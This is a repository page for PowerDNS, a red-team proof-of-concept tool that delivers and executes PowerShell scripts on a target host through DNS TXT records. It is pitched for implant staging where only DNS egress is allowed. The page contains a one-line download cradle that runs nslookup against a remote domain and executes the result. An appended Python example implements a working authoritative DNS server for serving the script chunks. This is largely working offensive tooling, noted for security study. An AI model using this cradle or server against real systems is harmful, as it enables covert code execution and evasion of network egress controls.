PowerDNS: Powershell DNS Delivery
Branch: master. Latest commit ed9fae3 (Oct 13, 2017) by mdsecactivebreach: Merge pull request #2 from byt3bl33d3r/master ("Fixed error when recv packets without UDP layer").
Files:
  README.md    Update README   Jul 13, 2017
  powerdns.py  I'm dumb        Oct 6, 2017

README.md

___                        ___  _ _  ___
| . \ ___  _ _ _  ___  _ _ | . \| \ |/ __>
|  _// . \| | | |/ ._>| '_>| | ||   |\__ \
|_|  \___/|__/_/ \___.|_|  |___/|_\_|<___/

@domchell, MDSec ActiveBreach

Description

PowerDNS is a simple proof of concept that demonstrates executing a PowerShell script on a target host using DNS only.

PowerDNS works by splitting the PowerShell script into chunks and serving each chunk as a DNS TXT record, which the target host retrieves through its normal DNS resolver rather than by connecting to the server directly.

Use cases for PowerDNS include delivering an implant stager over DNS, or introducing a PowerShell script into a tightly controlled environment where the only egress permitted is DNS resolution (for example, where HTTP/HTTPS egress is proxied or blocked but recursive DNS is allowed).

Usage:

In order to use PowerDNS, the powerdns.py server must run on the host that the domain's NS record points to (the authoritative name server for that domain) and be reachable on UDP port 53, since the target's resolver forwards TXT queries for names under that domain to it.

PowerDNS takes the file to serve, along with the domain that the server is authoritative for, as arguments:

# python powerdns.py -h
___                        ___  _ _  ___
| . \ ___  _ _ _  ___  _ _ | . \| \ |/ __>
|  _// . \| | | |/ ._>| '_>| | ||   |\__ \
|_|  \___/|__/_/ \___.|_|  |___/|_\_|<___/

@domchell, MDSec ActiveBreach

usage: powerdns.py [-h] [--file <file>] [--domain <domain>]

optional arguments:
  -h, --help         show this help message and exit
  --file <file>      PowerShell file to serve
  --domain <domain>  Domain with auth NS record

Example:

The following example serves the psh_payload.ps1 file for the domain foobar.com. The server prints the download cradle to run on the target host: nslookup -q=txt queries the TXT record for 0.foobar.com through the host's configured resolver, PowerShell's [-1] index selects the last line of nslookup's output (the record text), and the inner powershell executes it. Note that the cradle makes no attempt at stealth: powershell.exe spawning nslookup.exe with -q=txt, which in turn is followed by a second powershell.exe, is visible in ordinary process-creation telemetry.

# python powerdns.py --file psh_payload.ps1 --domain foobar.com
___                        ___  _ _  ___
| . \ ___  _ _ _  ___  _ _ | . \| \ |/ __>
|  _// . \| | | |/ ._>| '_>| | ||   |\__ \
|_|  \___/|__/_/ \___.|_|  |___/|_\_|<___/

@domchell, MDSec ActiveBreach

[*] PowerDNS: Splitting psh_payload.ps1 in to 18 chunk(s)
[*] PowerDNS: Use the following download cradle:
[*] PowerDNS: powershell "powershell (nslookup -q=txt -timeout=5 0.foobar.com)[-1]"
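The serving side of the technique described above (split the script into chunks, answer `<n>.<domain>` TXT queries with chunk n), as an added Python example that is not the project's powerdns.py. It assumes 255-byte chunks (the maximum for one TXT character-string), that chunk i is served at the name i.<domain>, and builds its own DNS query packets so the logic can be exercised offline; the handler sits in a plain UDP/53 loop so it can also be run as the authoritative server for the usage shown above. The project's cradle executes the text of chunk 0 directly, which implies chunk 0 in PowerDNS is a self-contained stager; this example does not reproduce that, so a client for it would have to query chunks 0..N-1 and join them.

```python
import socket
import struct

TYPE_TXT = 16
CLASS_IN = 1
CHUNK = 255   # one TXT <character-string> holds at most 255 bytes (assumed chunk size, not PowerDNS's)


def chunk_script(data: bytes, size: int = CHUNK) -> list:
    """Split the script into fixed-size chunks; chunk i is served as the TXT record of <i>.<domain>."""
    return [data[i:i + size] for i in range(0, len(data), size)]


def encode_name(name: str) -> bytes:
    """Wire-encode a domain name as length-prefixed labels ending in a zero byte."""
    labels = name.strip(".").split(".")
    return b"".join(struct.pack("B", len(lab)) + lab.encode() for lab in labels) + b"\x00"


def decode_name(pkt: bytes, off: int):
    """Decode an uncompressed name at offset `off`; returns (name, offset after the name)."""
    labels = []
    while True:
        n = pkt[off]
        off += 1
        if n == 0:
            return ".".join(labels), off
        if n & 0xC0:                      # compression pointers never appear in a QNAME
            raise ValueError("compressed label in question")
        labels.append(pkt[off:off + n].decode("latin-1"))
        off += n


def build_query(name: str, qtype: int = TYPE_TXT, txid: int = 0x1234) -> bytes:
    """Build the query a resolver would send (RD set, one question); used here for testing."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", qtype, CLASS_IN)


def build_response(query: bytes, chunks: list, domain: str) -> bytes:
    """Answer `<i>.<domain> IN TXT` with chunk i; anything else gets an authoritative NXDOMAIN."""
    if len(query) < 12:
        raise ValueError("short packet")
    txid, flags, qdcount = struct.unpack(">HHH", query[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    qname, off = decode_name(query, 12)
    qtype, qclass = struct.unpack(">HH", query[off:off + 4])
    question = query[12:off + 4]
    rd = flags & 0x0100                   # echo the RD bit back to the resolver
    suffix = "." + domain.strip(".").lower()
    lname = qname.lower()                 # DNS names are case-insensitive
    label = lname[:-len(suffix)] if lname.endswith(suffix) else ""
    if (qtype == TYPE_TXT and qclass == CLASS_IN and label.isascii()
            and label.isdigit() and int(label) < len(chunks)):
        chunk = chunks[int(label)]
        rdata = struct.pack("B", len(chunk)) + chunk
        # 0xC00C points back at the QNAME; TTL 0 so resolvers do not cache the chunk
        answer = b"\xc0\x0c" + struct.pack(">HHIH", TYPE_TXT, CLASS_IN, 0, len(rdata)) + rdata
        return struct.pack(">HHHHHH", txid, 0x8400 | rd, 1, 1, 0, 0) + question + answer
    # QR=1, AA=1, RCODE=3; a stricter server would return NODATA for a known name with another type
    return struct.pack(">HHHHHH", txid, 0x8400 | rd | 3, 1, 0, 0, 0) + question


def rcode(resp: bytes) -> int:
    """Response code from the header flags (0 = NOERROR, 3 = NXDOMAIN)."""
    return struct.unpack(">H", resp[2:4])[0] & 0xF


def parse_txt_answer(resp: bytes) -> list:
    """Return the TXT character-strings of the first answer RR as built by build_response ([] if none)."""
    ancount = struct.unpack(">H", resp[6:8])[0]
    if ancount == 0:
        return []
    _, off = decode_name(resp, 12)
    off += 4 + 2                          # skip QTYPE/QCLASS and the 2-byte name pointer
    rdlen = struct.unpack(">HHIH", resp[off:off + 10])[3]
    rdata, strings, i = resp[off + 10:off + 10 + rdlen], [], 0
    while i < len(rdata):
        n = rdata[i]
        strings.append(rdata[i + 1:i + 1 + n])
        i += 1 + n
    return strings


def serve(path: str, domain: str, bind: str = "0.0.0.0", port: int = 53) -> None:
    """Serve `path` over DNS; run on the host the domain's NS record points to (root needed for port 53)."""
    with open(path, "rb") as f:
        chunks = chunk_script(f.read())
    print(f"[*] serving {path} as {len(chunks)} chunk(s) under *.{domain}")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind, port))
    while True:
        pkt, peer = sock.recvfrom(512)
        try:
            resp = build_response(pkt, chunks, domain)
        except (ValueError, IndexError, struct.error):
            continue                      # malformed query: drop it rather than crash the server
        sock.sendto(resp, peer)


if __name__ == "__main__":
    import sys
    serve(sys.argv[1], sys.argv[2])       # e.g. sudo python3 powerdns_example.py psh_payload.ps1 foobar.com
```

Once it is running on the authoritative host, `nslookup -q=txt 0.foobar.com` from a client (or `dig +short TXT 0.foobar.com`) should return the first 255 bytes of the script, and a name outside the chunk range or outside the domain should come back NXDOMAIN.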
